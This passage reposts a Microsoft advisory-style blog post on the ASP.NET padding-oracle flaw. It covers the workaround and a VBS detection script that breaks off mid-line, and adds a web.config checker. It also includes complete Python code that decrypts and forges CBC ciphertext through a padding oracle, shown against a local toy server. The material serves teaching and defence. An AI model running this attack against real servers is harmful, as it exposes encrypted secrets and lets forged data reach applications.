Understanding the ASP.NET Vulnerability

Source: Internet
Author: User

Our recent advisory describes an ASP.NET vulnerability which was recently publicly disclosed. This blog post will give you more information about the vulnerability and the workaround. It will also provide a script which will help you detect ASP.NET applications on your server that are in a vulnerable configuration.

The Impact of the Vulnerability

ASP.NET uses encryption to hide sensitive data and protect it from tampering by the client. However, a vulnerability in the ASP.NET encryption implementation can allow an attacker to decrypt and tamper with this data.

But what can the attacker do with this capability? Part of the answer depends on the ASP.NET application being attacked. For example, if the ASP.NET application stores sensitive information, such as passwords or database connection strings, in the ViewState object, this data could be compromised. The ViewState object is encrypted and sent to the client in a hidden form variable, so it is a possible target of this attack.

If the ASP.NET application is using ASP.NET 3.5 SP1 or above, the attacker could use this encryption vulnerability to request the contents of an arbitrary file within the ASP.NET application. The public disclosure demonstrated using this technique to retrieve the contents of web.config. Any file in the ASP.NET application which the worker process has access to will be returned to the attacker.

How the Vulnerability Works

To understand how this vulnerability works, you need to know about cryptographic oracles. An oracle in the context of cryptography is a system which provides hints as you ask it questions. In this case, there is a vulnerability in ASP.NET which acts as a padding oracle: it allows an attacker to send chosen ciphertext to the server and learn whether it decrypted to correctly padded data by examining which error code the server returned.

By making repeated requests, each with a slightly modified ciphertext, the attacker can learn enough to decrypt the rest of the ciphertext without ever learning the key. The attacker can then alter the plaintext and re-encrypt it as well, since the same oracle yields the values needed to build a ciphertext of the attacker's choosing.
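The attack the two paragraphs above describe, as an added worked example (not code from the original post and not Microsoft's or the ASP.NET team's code). The block cipher is a toy Feistel construction standing in for AES so the example runs offline with the standard library; the attack itself only depends on CBC mode, PKCS#7 padding and a server that answers "padding valid" or "padding invalid", which for ASP.NET is the distinguishable error response. `Server`, `recover_intermediate`, `decrypt_via_oracle` and `forge_via_oracle` are this example's own names. `recover_intermediate` handles the one edge case that trips up naive implementations (a 0x01 hit that is really a longer valid padding), `decrypt_via_oracle` recovers the plaintext with no key, and `forge_via_oracle` is the "alter and re-encrypt" step: it builds a ciphertext that decrypts to attacker-chosen plaintext.

```python
"""Padding-oracle decryption and forgery against CBC + PKCS#7 (added example).
The Feistel block cipher is a toy stand-in for AES (stdlib only, NOT secure)."""
import hashlib
import hmac
import os

BLOCK, ROUNDS = 16, 4

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):  # toy round function: keyed hash of one 8-byte half
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(ROUNDS):
        l, r = r, xor(l, _f(key, i, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(ROUNDS)):
        l, r = xor(r, _f(key, i, l)), l
    return l + r

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):  # returns IV || C1 || ... || Cn
    padded, out, prev = pkcs7_pad(plaintext), b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out

def cbc_decrypt(key, data):
    out = b""
    for i in range(BLOCK, len(data), BLOCK):
        out += xor(block_decrypt(key, data[i:i + BLOCK]), data[i - BLOCK:i])
    return pkcs7_unpad(out)

class Server:  # the vulnerable app: key stays secret, but a padding failure is observable
    def __init__(self):
        self.key = os.urandom(16)

    def padding_ok(self, data):  # in ASP.NET's case: which error response came back
        try:
            cbc_decrypt(self.key, data)
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, target):
    """Recover D_k(target) byte by byte from the end, using only yes/no answers."""
    inter = bytearray(BLOCK)
    for pad in range(1, BLOCK + 1):
        j = BLOCK - pad
        for guess in range(256):
            crafted = bytearray(BLOCK)
            crafted[j] = guess
            for k in range(j + 1, BLOCK):  # bytes already known: force them to `pad`
                crafted[k] = inter[k] ^ pad
            if not oracle(bytes(crafted) + target):
                continue
            if pad == 1:
                # a 0x01 hit may really be 02 02 / 03 03 03 ...; a genuine one survives this
                crafted[j - 1] ^= 0xFF
                if not oracle(bytes(crafted) + target):
                    continue
            inter[j] = guess ^ pad
            break
        else:
            raise RuntimeError("no hit for byte %d: server is not an oracle" % j)
    return bytes(inter)

def decrypt_via_oracle(oracle, data):  # P_i = D_k(C_i) XOR C_{i-1}, with C_0 = IV
    plain = b""
    for i in range(BLOCK, len(data), BLOCK):
        plain += xor(recover_intermediate(oracle, data[i:i + BLOCK]), data[i - BLOCK:i])
    return pkcs7_unpad(plain)

def forge_via_oracle(oracle, plaintext):
    """Backwards from an arbitrary last block: C_{i-1} = D_k(C_i) XOR wanted P_i."""
    padded = pkcs7_pad(plaintext)
    blocks = [padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]
    out = [os.urandom(BLOCK)]
    for wanted in reversed(blocks):
        out.insert(0, xor(recover_intermediate(oracle, out[0]), wanted))
    return b"".join(out)

if __name__ == "__main__":
    srv = Server()
    ct = cbc_encrypt(srv.key, os.urandom(BLOCK), b"Password=s3cret")  # constructed sample
    print(decrypt_via_oracle(srv.padding_ok, ct))
    print(cbc_decrypt(srv.key, forge_via_oracle(srv.padding_ok, b"role=admin")))
```

Each recovered block costs at most 16 × 256 oracle queries, which is why a server that answers quickly and distinctly (a 500 versus a 404, a different error page, a different body length) is all the attacker needs; `forge_via_oracle` never sees a key either, it just chains the same per-block recovery backwards from a random final block.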

The Workaround-Silencing the Oracle

The workaround for this vulnerability is to use the customErrors feature of ASP.NET to configure applications to return the same error page regardless of the error encountered on the server.

By following the steps in the advisory to map all error messages to a single error page, you make it difficult for the attacker to distinguish between the different types of errors, effectively limiting access to the oracle.
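What "the same error page regardless of the error" looks like in web.config, together with a check for it, as an added example that is not from the original post and is not Microsoft's DetectCustomErrorsDisabled.vbs. The four configurations are constructed samples, not taken from any real site; `check_custom_errors` and its rules are this example's own reading of the workaround: no customErrors element, mode="Off", no defaultRedirect, or per-status `<error>` mappings all leave responses distinguishable, and for 3.5 SP1 and later the advisory's form of the workaround uses redirectMode="ResponseRewrite", so anything else is reported too.

```python
"""Flag web.config files whose customErrors settings still let error responses
differ (added example; a simplified stand-in for the VBS script's check)."""
import xml.etree.ElementTree as ET

def _child(elem, tag):
    """First direct child with this tag, or None (avoids XPath quirks with 'system.web')."""
    for c in elem:
        if c.tag == tag:
            return c
    return None

def check_custom_errors(web_config, net35sp1_or_later=True):
    """Return (vulnerable, findings) for one web.config body (string).

    Vulnerable means an attacker can still tell error kinds apart from the
    response, so the padding oracle is not silenced."""
    root = ET.fromstring(web_config)
    system_web = _child(root, "system.web")
    ce = _child(system_web, "customErrors") if system_web is not None else None
    if ce is None:
        return True, ["no <customErrors> element: built-in error pages differ by error type"]
    findings = []
    mode = ce.get("mode", "RemoteOnly").lower()   # RemoteOnly is the ASP.NET default
    if mode == "off":
        findings.append("mode=Off: detailed, distinguishable errors go to every client")
    if not ce.get("defaultRedirect"):
        findings.append("no defaultRedirect: generic built-in pages still differ by status code")
    per_status = sorted(e.get("statusCode", "?") for e in ce if e.tag == "error")
    if per_status:
        findings.append("per-status <error> mappings (%s) keep responses distinguishable"
                        % ", ".join(per_status))
    if net35sp1_or_later and ce.get("redirectMode", "ResponseRedirect") != "ResponseRewrite":
        findings.append("redirectMode is not ResponseRewrite (advisory form for 3.5 SP1+)")
    return bool(findings), findings

# Constructed sample configurations (hypothetical; not from a real server).
WEAK_OFF = """<configuration><system.web>
  <customErrors mode="Off"/>
</system.web></configuration>"""

WEAK_PER_STATUS = """<configuration><system.web>
  <customErrors mode="On" defaultRedirect="~/error.html">
    <error statusCode="404" redirect="~/notfound.html"/>
    <error statusCode="500" redirect="~/servererror.html"/>
  </customErrors>
</system.web></configuration>"""

MISSING = "<configuration><system.web/></configuration>"

FIXED = """<configuration><system.web>
  <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/error.aspx"/>
</system.web></configuration>"""

if __name__ == "__main__":
    for name, cfg in [("WEAK_OFF", WEAK_OFF), ("WEAK_PER_STATUS", WEAK_PER_STATUS),
                      ("MISSING", MISSING), ("FIXED", FIXED)]:
        vulnerable, findings = check_custom_errors(cfg)
        print(name, "VULNERABLE" if vulnerable else "ok", findings)
```

The second sample is the case that is easy to miss: customErrors is "On" and has a defaultRedirect, yet the separate 404 and 500 mappings hand the attacker exactly the distinction the oracle needs. Run the check with `net35sp1_or_later=False` for applications on older framework versions, where the plain defaultRedirect form is the one the advisory gives.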

How to Detect Vulnerable ASP. Net Applications

Some ASP.NET applications may already be configured to return the same error page for all server errors. To detect ASP.NET applications that are not configured this way and need to have the workaround applied to them, use the following script:

' DetectCustomErrorsDisabled.vbs Script
' Version 3.1
'
' This script will help detect vulnerable configuration for the Padding Oracle
' ASP.Net vulnerability documented in MS advisory 2416728.
'
' http://www.microsoft.com/technet/security/advisory/2416728.mspx
'
' Usage:
'     cscript DetectCustomErrorsDisabled.vbs [RemoteServerName]
'
' NOTE: THIS SCRIPT USES THE FILESYSTEM AND SHELL OBJECT AND SHOULD BE
'       RUN AS AN ADMINISTRATOR
'
' The script works by enumerating all web.config and assessing if the
' side-channel leak for the padding oracle vulnerability is mitigated by the
' use of homogenizing custom error responses from ASP.Net applications.
'
' Note: On IIS 7 servers, this script requires IIS6 compatibility mode to be
' installed.
'
' More information on: http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx
'
' Version History:
' 1.0 - Initial version
' 2.0 - Added additional checks for app/site root config
' 3.0 - Added error validation for XML parsing and path checks
' 3.1 - Added check for missing root web.config

OPTION EXPLICIT
ON ERROR RESUME NEXT

DIM strServer
DIM objWebService, objWebServer, objDir, objFileSys
DIM physicalPath, dir, xmlDoc, nodeList, node, ret
DIM configFile, configFilePath, configLine
DIM childNodes, ErrPage500, ErrPage404, errFound
DIM index, errCount

strServer = "localhost"

' Parse command line input
IF WScript.Arguments.Length=1 THEN
    strServer = WScript.Arguments( 0 )
END IF

IF WScript.Arguments.Length>1 THEN
    WScript.Echo "Illegal number of arguments"
    WScript.Echo "Usage: cscript.exe DetectCustomErrorsDisabled.vbs [RemoteServerName]"
    WScript.Quit( 1 )
END IF

' Initializations
SET objFileSys = CreateObject("Scripting.FileSystemObject")
SET objWebService = GetObject( "IIS://" & strServer & "/W3SVC" )
IF Err <> 0 THEN
    WScript.Echo "Could not find IIS ADSI object. Make sure you have IIS and IIS6 management compatibility installed."
    WScript.Quit (1)
END IF

SET xmlDoc = CreateObject("Microsoft.XMLDOM")

IF IsNull(objFileSys) THEN
    WScript.Echo "Failed to create FileSystemObject. Please run script as Admin."
    WScript.Quit (1)
END IF

IF IsNull(objWebService) THEN
    WScript.Echo "Failed to connect to IIS ADSI provider. Make sure you have IIS6 "_
    + "management compatibility role service installed."
    WScript.Quit (1)
END IF

WScript.Echo("Enumerating possible paths with ASP.Net configuration that have" _
    +" custom errors turned off.")
WScript.Echo ("")

' Search web server for unsafe configuration
FindASPNetConfig(objWebService)

' Search all paths on web server for possible web.config files.
SUB FindASPNetConfig(WebService)
    FOR EACH objWebServer IN WebService
        IF objWebserver.Class = "IIsWebServer" THEN
            EnumDirectories(objWebServer)
        END IF
    NEXT
END SUB

' Recursively go through vdirs and webdirs
SUB EnumDirectories(objDir)
    DIM objSubDir
    ' The first call to this is from IIsWebServer, so we can skip that
    FOR EACH objSubDir IN objDir
        IF (objSubDir.Class = "IIsWebVirtualDir") THEN
            GetPhysicalPaths(objSubDir)
            EnumDirectories(objSubDir)
        END IF
    NEXT
END SUB

' Get physical paths for web and virtual directories
SUB GetPhysicalPaths(objDir)
    physicalPath = objDir.Path
    CALL EnumWebConfig(physicalPath,1)
END SUB

' Recursively search for web.config files.
SUB EnumWebConfig(Path,IsRoot)
    IF NOT objFileSys.FolderExists(Path) THEN
        IF IsRoot THEN
            WScript.Echo Path & ": Sites disk path is incorrect and root web.config does not exist"
            WScript.Echo Path & ": ** Vulnerable configuration f
